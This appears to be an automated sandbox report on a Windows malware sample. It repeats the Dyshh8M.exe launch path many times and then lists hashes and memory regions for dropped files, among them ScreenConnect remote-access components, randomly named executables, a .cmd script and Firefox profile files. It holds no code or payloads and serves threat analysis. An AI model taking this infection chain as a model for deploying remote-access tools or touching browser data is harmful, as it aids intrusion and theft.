"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe


Network


Files

SHA512 812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

memory/3088-226-0x0000000004980000-0x00000000049C1000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsCredentialProvider.dll

MD5 41b8d757cbc2351fd9c0bf56aedede06
SHA1 10b528623a517c71956d0c50c4eba086988af615
SHA256 86432f33567ef172674fd7a828afa6a62e9d90efc8dba6199d803b0888d35e1b
SHA512 246f6d3a3ccee1c33713b564ff36e02a3bc594ad372deea9d7fb631f9f4f71fc5e5b0cc7f592b667ba5d731365a2b2992d3a95e434ae50fd58ba25e0d8be13a7

memory/3088-228-0x0000000004C00000-0x0000000004CD5000-memory.dmp

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.en-US.resources

MD5 d524e8e6fd04b097f0401b2b668db303
SHA1 9486f89ce4968e03f6dcd082aa2e4c05aef46fcc
SHA256 07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4
SHA512 e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.en-US.resources

MD5 dfd0bdff874bb29b508f15bdd35cb6a3
SHA1 de772d64129e084d150d8087ccdac16ef97fb185
SHA256 38bdcc2ec25e7464dde7293b5a6ec64eea4b9d9f6fb8c36fdcc5677a6f55b721
SHA512 6addfae10478871085c796f2af5a11cd78088fc49b245df2229db7546973ff9a16785c72bf61f569e16a3e79f7f48ef8c1badb91313271d9515af3d3b4b759b0

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.Override.resources

MD5 11253402db9bbf80767d4b7c6db85ff9
SHA1 9e9f706703ecb0219e1fbe52fce7d74512cea174
SHA256 632fff03862ed945d5697279fa1e466025aa63d14b435cc50f44de316aa3250b
SHA512 9edf6df9e04e6c80619579200e33b3ac11b722fc3a94391af8ea44f1fbd00ad7180ef3898f7b23ace425da7a094be512cd744ac8fddd28e79eeb14d2b3359ee4

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\Client.resources

MD5 5cd580b22da0c33ec6730b10a6c74932
SHA1 0b6bded7936178d80841b289769c6ff0c8eead2d
SHA256 de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c
SHA512 c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe

MD5 afa993c978bc52d51e8af08a02892b4e
SHA1 6d92666ae52761ad1e6c5fbb8e1355354516bed7
SHA256 08efe3e41bd508e2e9c3f8cf4d466cb1c96c35c1b463e79f2a24ac031ab79b48
SHA512 d9d17361cb3c24f640086efd97f42b15b642917898879710d35b58f8f746b51936518fbde1f1fb45c1d524bcbeba74b4cbde7f32308af8cc7a8149a6eede18f2

C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe.config

MD5 728175e20ffbceb46760bb5e1112f38b
SHA1 2421add1f3c9c5ed9c80b339881d08ab10b340e3
SHA256 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077
SHA512 fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

memory/992-240-0x0000000002770000-0x00000000027A6000-memory.dmp

memory/992-239-0x0000000000530000-0x00000000005C6000-memory.dmp

memory/992-241-0x000000001B490000-0x000000001B51C000-memory.dmp

memory/992-242-0x000000001B6D0000-0x000000001B87C000-memory.dmp

C:\Config.Msi\e589d26.rbs

MD5 7ef355d62cef74c6475ceebe6b12a597
SHA1 b8a5be51ad4806f80e11ead5fbf18a52e1977f5b
SHA256 e20a9b0006c52bcca8e6ec4a74bca17809e980e2458eeacf71df9d86aaf500fa
SHA512 97235b8807b133f0b8dc6276c6848efa31d81feb812a2876a9cf612dff0cb3e09e3b1eadc6af25fd3fb001b63f7e9703994ed96579e981e49aebeb8a878102d7

memory/992-255-0x000000001CAC0000-0x000000001CC46000-memory.dmp

memory/992-258-0x0000000002740000-0x0000000002758000-memory.dmp

memory/992-259-0x00000000027D0000-0x00000000027E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

MD5 5487dcc2e2a5d7e109c3fd49f37a798b
SHA1 1ad449a9ef2e12d905e456f9b56f97a3d0544282
SHA256 b9be721252182d14fe65f1240fa16caa0238346b329fb6139e891f0c94c99ce5
SHA512 ee89ea43516275c73e9227dd6f26c2ceaf717928b9b376f65e891d9eb9110f6596d0c6e8f7bf78b51e0dc3a3acaba2c77d64d8b567b49943439c28344fb21845

memory/3340-267-0x00000188BA970000-0x00000188BA9C2000-memory.dmp

memory/3920-276-0x00000000002D0000-0x0000000000440000-memory.dmp

memory/3340-278-0x00000188BAA80000-0x00000188BAA92000-memory.dmp

memory/3340-279-0x00000188BAC00000-0x00000188BAC3C000-memory.dmp

memory/3340-277-0x00000188D4800000-0x00000188D490A000-memory.dmp

memory/3340-281-0x00007FF632000000-0x00007FF6321AE000-memory.dmp

memory/3340-285-0x00000188D4CE0000-0x00000188D4EA2000-memory.dmp

memory/3340-286-0x00000188D53E0000-0x00000188D5908000-memory.dmp

memory/3340-287-0x00000188D46F0000-0x00000188D4740000-memory.dmp

memory/30656-303-0x00007FF79DED0000-0x00007FF79E07E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10033420101\7axE6Jz.exe

MD5 ab118fd9c6e1c3813ff0ec7cd8c6539f
SHA1 a03967883de5cfbe96036d13eac74bbb030903ef
SHA256 57153e88e47ac7b13751e8382e021cad96481f68bfa41510ed5b402adbecd7ad
SHA512 4b119738f8843025fe8c158c02a32c1e147fdbce41671c80ef58f1daec3f555fbe0248ed7174cfdebce0c5c987b616824288e3246953a79910a5504bf27fc297

memory/47720-320-0x00000000001A0000-0x0000000000208000-memory.dmp

memory/47916-323-0x0000000000400000-0x000000000045E000-memory.dmp

memory/47916-322-0x0000000000400000-0x000000000045E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe

MD5 139801ec12921d4a10cade0e8bd14581
SHA1 19e4ea0a6204a9256bb2671aec86b1942d0bb63c
SHA256 8a32ddf6678734e654e2c128673789991b08f31d4c0049f168774f0b056a2796
SHA512 2d6c0a6923b278d648b20f3091cabdf889f5ae7e767675c8eb93fb23f607b1e6cb8ea891bf827932efa78dddddb32671045d2e52adac73ff764c7286bc542601

memory/110836-341-0x00000000014C0000-0x000000000151F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035810101\4284dc1285.exe

MD5 454bd2cde5257315f133cfc64bcd0351
SHA1 ccfb541cc802100b3d0bc4c4147bf0363675be2b
SHA256 61a5dd7249aa43b42abc2ce22d7937dc68c7c3748d20784cb86dd7135080d580
SHA512 da676aed2ed94912d7a8d84c670d6c49a91a3bd932cf88bfa141e8db16c358c64ecaa561ca34f53f9ead0e4fdbdd534aa380edba700f2582c9606a4ab270838f

memory/129624-361-0x0000000002BB0000-0x0000000002BE6000-memory.dmp

memory/129624-362-0x00000000054F0000-0x0000000005B18000-memory.dmp

memory/129624-365-0x0000000005B90000-0x0000000005BF6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tfdb2j4d.kvx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/129624-364-0x0000000005260000-0x00000000052C6000-memory.dmp

memory/129624-363-0x00000000050C0000-0x00000000050E2000-memory.dmp

memory/129624-375-0x0000000005C00000-0x0000000005F54000-memory.dmp

memory/129624-376-0x0000000006190000-0x00000000061AE000-memory.dmp

memory/129624-377-0x00000000061E0000-0x000000000622C000-memory.dmp

memory/129624-380-0x00000000066D0000-0x00000000066EA000-memory.dmp

memory/129624-379-0x0000000007AD0000-0x000000000814A000-memory.dmp

memory/129624-382-0x0000000007670000-0x0000000007706000-memory.dmp

memory/129624-383-0x0000000007600000-0x0000000007622000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035820121\am_no.cmd

MD5 189e4eefd73896e80f64b8ef8f73fef0
SHA1 efab18a8e2a33593049775958b05b95b0bb7d8e4
SHA256 598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396
SHA512 be0e6542d8d26284d738a33df3d574d9849d709d091d66588685a1ac30ed1ebef48a9cc9d8281d9aeebc70fed0ddae22750cd253ec6b89e78933de08b0a09b74

memory/138956-402-0x00000000060C0000-0x0000000006414000-memory.dmp

memory/138956-412-0x00000000067A0000-0x00000000067EC000-memory.dmp

memory/140112-424-0x0000000006110000-0x000000000615C000-memory.dmp

memory/142248-445-0x0000000006820000-0x000000000686C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe

MD5 4c3d80aa96c22ae2f7b01a904aef5ba0
SHA1 5a4fe29daf45ada28b3a03a8284dcd098d935942
SHA256 67ff99a32813cf55f119ca58c82c508a4d2d4e535fcc653fda16df801681299f
SHA512 a372cb16a04d2540802ebcfb70c731097c44ae0b9e09d7b161fda8b73d4d4b11194de0c8cb60b2d05a86140b9f4d8258125564678574fa0182e944b5ac93d204

memory/144556-466-0x0000000000650000-0x0000000000B2E000-memory.dmp

memory/145836-476-0x0000000000270000-0x000000000074E000-memory.dmp

memory/144556-478-0x0000000000650000-0x0000000000B2E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10000290101\runtimer.exe

MD5 b5001d168ba5139846f2848c8e05a6ee
SHA1 080f353ab857f04ea65b78570bfa998d1e421ea2
SHA256 059e600a06b4b6671fa440728b932adff7d246441bf328fcc4a8e29d4df11a23
SHA512 d608f6f4ed7de73308ab7b231b343d5a832b2c0a68b0d0522d2df4c4a8cc15e12685b2ffcb8232b58b4c519979e4307179964fa4011752288f63f72090828143

memory/160076-491-0x0000000000400000-0x000000000087F000-memory.dmp

memory/145836-507-0x0000000000270000-0x000000000074E000-memory.dmp

memory/166548-508-0x0000000000AF0000-0x0000000000DF4000-memory.dmp

memory/166548-511-0x0000000000AF0000-0x0000000000DF4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036500101\325e33a3f3.exe

MD5 c0de6fd5072e5af19dc57d131b1b0138
SHA1 d8680c639b0f2bd288c61896a9dfce9f1b49bc56
SHA256 9e74ed79de88b2c8aedc0578e3c8cf96ffb908d72a641a72205de6c2a766aaa4
SHA512 60cf165679f2103c2945dcf8a3ddbeca604556c62c2f5821c1f11175aaf44c3b4896542b6c5f25f7dceb29d0959d6f71b578748111522d1fd1021758f6ae9e77

memory/160076-527-0x0000000000400000-0x000000000087F000-memory.dmp

memory/160076-528-0x0000000000400000-0x000000000087F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\pending_pings\bde789b2-f6b8-44e0-b904-f020b2bd97df

MD5 86f2067cd589c6f38624d3043a67f97e
SHA1 82ac3272fd92470d8451af73d47e4260941979df
SHA256 4f66563b669936192658db692a7db5afcae432981e7cccdcb6c2b418d0196f19
SHA512 87804b3da7d8b8143d7c9a8859582d2e7394a1867f118e01dfb54edfe6282ef21ac92662e05f870e62bbf1fb298818940f6b3a7330bae0b9181101c633995d92

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.tmp

MD5 1f74f1ff867c402d534cf3a1a9305a41
SHA1 88f3633f2b82bee6e86134315998e8ce3cd655f6
SHA256 c64b504fe346b04ed46d9c2484cb40f2144b17e932a2b6e6f012dffcffc37629
SHA512 6edf504d4fcea71d1b26397f4bcfbee13208143257c66c4fb1bfbc58b36978957afedfbda8c9738ac65630fccd4c701c4e84e0ce12515541c59820a138ecad65

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\prefs.js

MD5 a2bd9c84412f5b31fade1e211950a0c0
SHA1 a4c315d4eb5cfca7a9163365924f6e9aa83d24a9
SHA256 5f4ca500f2a88d8562c34fd0bec54244f7dfb8e3b0029a62f61d80f992d595fe
SHA512 d7cf8b7429548da8fd70f2691ef94d67b73fe527acdb38b3f21a1de1137bb0f6e08c6f5021c329b1abc17955f9e30c07c79ec9082c92d40413801e8cf2c7bf0b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\AlternateServices.bin

MD5 3c6370ff5a38e4650881368ff0825443
SHA1 953b8cd8764364cd093a063d4d9b5730863f4a0f
SHA256 21f4b2a509530ddee0813f3da97192f234823cdffc2024f447c15deca61aa7c4
SHA512 bf55812e03fe4e04fbdff86f58d62bdab1046be7faff75fe2f1acf3cd60d1b0b02b41fd2013fd1c8d0b7bdcc79ccbe12e644da1771d9aef170ad32c49a2b2fa4

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\prefs-1.js

MD5 7265ba0b5a8d48c93f863f91f3b83626
SHA1 4d3f6dee8c82c39a545813932f0d9c1c06f0cf96
SHA256 89b8f00fe73464c8c23c4ac125eea5132dcb59790f88c9f2b6cc2bbb8da9ee0d
SHA512 5972bfd0c78f523a1f4556eb4a174581e2f75ebf3107695f8f56fa844859e7a9a8d5be73b3b31144ae9810d10a908afb4592ad803c1e9ed5cbf18ccccbc32661

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\AlternateServices.bin

MD5 9367c425d4413fb194cc17c2e8cfa55a
SHA1 c51bec1c2d54dc0663192fb114c316a9e1123145
SHA256 f07a9f0159b31c52b13db6a9e4262219bec798531b3dbd279b135b02c7d742c8
SHA512 aa5a2ec17d63ab779c9cb9a81dc05c3586b3e606761fae11c8c9d3ad1146b3fa825847cdbce3031e87949fcfa19a98f9990a9ebc1cb924848a91edcd9e62d93d

memory/197036-1173-0x0000000000270000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.bin

MD5 905eb7fa5f4e255d9cfe05ed0d525a0a
SHA1 6911b9d2b25236ce5703bfa4fbe806888d10605a
SHA256 ff05ea0a84457916296a692090b5f548c4f71c720a5307e9f39fd43c39a523a3
SHA512 edf946ec3450196735288d5f7a43e26a35171ac34cf9b65db02e48def1d1d78006c348ea0edb1059ebe3df447a146c4ac017826ac02ec0ead5af7434504a3a56

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\2psyjw2x.default-release\datareporting\glean\db\data.safe.tmp

MD5 d0189c86d2d58de33cf282b8de2d26a9
SHA1 e5bac149f0214541716e08ef25ae7673036072c9
SHA256 0d3892e6a35698ae89c03be360eb58e8ca89e79ba47467f9ea590619b3ca0b1e
